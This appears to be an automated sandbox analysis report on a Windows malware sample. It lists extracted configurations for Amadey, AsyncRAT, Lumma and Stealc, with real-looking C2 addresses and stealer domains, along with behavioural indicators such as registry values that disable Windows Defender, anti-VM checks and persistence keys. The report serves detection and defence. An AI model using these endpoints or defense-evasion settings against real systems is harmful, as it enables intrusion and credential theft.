Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 15:06
Static task
static1
Behavioral task
behavioral1
Sample
d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe
Resource
win10v2004-20241007-en
General
-
Target
d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe
-
Size
3.1MB
-
MD5
f8018bbe2183b62993997b8f62c299da
-
SHA1
dad03527414a7d258cf7e3436f7d3712b80594f9
-
SHA256
d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3
-
SHA512
5a5f0512046f219a471731c3e548dab7d3ddb861e302f35a9961776578a31a3ca08b27e8f728027e5c4246fe7285eceb1da553f36ebcd4d7e4d299f54692134b
-
SSDEEP
49152:uSySqgVOLFJJZDlLWJFV+F5UG8zXaRngzfE/:uCqN5JJZDlLWJ7+UG8zqR
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://atten-supporse.biz/api
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://atten-supporse.biz/api
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Asyncrat family
-
Gcleaner family
-
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 50452030ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 50452030ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 50452030ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 50452030ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 50452030ad.exe -
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/2632-117-0x000000000A190000-0x000000000A2B2000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1216 created 3980 1216 powershell.exe 96 -
Async RAT payload 3 IoCs
resource yara_rule behavioral2/memory/2632-43-0x00000000009B0000-0x0000000000E12000-memory.dmp family_asyncrat behavioral2/memory/2632-44-0x00000000009B0000-0x0000000000E12000-memory.dmp family_asyncrat behavioral2/memory/2632-197-0x00000000009B0000-0x0000000000E12000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c92de24d75.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5a5b5e6249.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 50452030ad.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f138def07d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c92de24d75.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5a5b5e6249.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c92de24d75.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 50452030ad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f138def07d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f138def07d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5a5b5e6249.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 50452030ad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HyperServerFontdll.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation UkYEOVR.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation H3tyh96.exe -
Executes dropped EXE 12 IoCs
pid Process 384 skotes.exe 2632 H3tyh96.exe 3540 UkYEOVR.exe 2832 f138def07d.exe 2164 c92de24d75.exe 4808 HyperServerFontdll.exe 3592 5a5b5e6249.exe 4996 9b2bbd9be9.exe 824 50452030ad.exe 4360 winlogon.exe 1744 skotes.exe 5680 skotes.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 50452030ad.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine H3tyh96.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine f138def07d.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine c92de24d75.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine 5a5b5e6249.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Wine skotes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 50452030ad.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 50452030ad.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c92de24d75.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013736001\\c92de24d75.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5a5b5e6249.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013737001\\5a5b5e6249.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9b2bbd9be9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013738001\\9b2bbd9be9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\50452030ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013739001\\50452030ad.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 4680 powershell.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023c56-289.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 384 skotes.exe 2632 H3tyh96.exe 2832 f138def07d.exe 2164 c92de24d75.exe 3592 5a5b5e6249.exe 824 50452030ad.exe 1744 skotes.exe 5680 skotes.exe -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Multimedia Platform\c5b4cb5e9653cc HyperServerFontdll.exe File created C:\Program Files\7-Zip\Lang\RuntimeBroker.exe HyperServerFontdll.exe File opened for modification C:\Program Files\7-Zip\Lang\RuntimeBroker.exe HyperServerFontdll.exe File created C:\Program Files\7-Zip\Lang\9e8d7a4ca61bd9 HyperServerFontdll.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\dllhost.exe HyperServerFontdll.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\5940a34987c991 HyperServerFontdll.exe File created C:\Program Files (x86)\Windows Multimedia Platform\services.exe HyperServerFontdll.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe File created C:\Windows\System\Speech\winlogon.exe HyperServerFontdll.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1776 sc.exe 3952 sc.exe 5012 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3304 2632 WerFault.exe 86 3992 2832 WerFault.exe 98 -
System Location Discovery: System Language Discovery 1 TTPs 30 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c92de24d75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 9b2bbd9be9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 9b2bbd9be9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UkYEOVR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9b2bbd9be9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50452030ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5a5b5e6249.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f138def07d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 1528 taskkill.exe 2576 taskkill.exe 2976 taskkill.exe 3032 taskkill.exe 4212 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings UkYEOVR.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings HyperServerFontdll.exe Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1732 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 384 skotes.exe 384 skotes.exe 2632 H3tyh96.exe 2632 H3tyh96.exe 2632 H3tyh96.exe 2632 H3tyh96.exe 2632 H3tyh96.exe 2832 f138def07d.exe 2832 f138def07d.exe 1216 powershell.exe 1216 powershell.exe 1216 powershell.exe 2164 c92de24d75.exe 2164 c92de24d75.exe 1216 powershell.exe 4680 powershell.exe 4680 powershell.exe 4680 powershell.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 3592 5a5b5e6249.exe 3592 5a5b5e6249.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe 4808 HyperServerFontdll.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
description pid Process Token: SeDebugPrivilege 2632 H3tyh96.exe Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 596 whoami.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 4808 HyperServerFontdll.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1444 whoami.exe Token: SeDebugPrivilege 1528 taskkill.exe Token: SeDebugPrivilege 2576 taskkill.exe Token: SeDebugPrivilege 2976 taskkill.exe Token: SeDebugPrivilege 3032 taskkill.exe Token: SeDebugPrivilege 4212 taskkill.exe Token: SeDebugPrivilege 4360 winlogon.exe Token: SeDebugPrivilege 824 50452030ad.exe Token: SeDebugPrivilege 3148 firefox.exe Token: SeDebugPrivilege 3148 firefox.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 1216 d7ee4d77ecce5c664aa43efa81cfc94981b1db50195ec415c4f8782322bc9fd3.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 3148 firefox.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe 4996 9b2bbd9be9.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
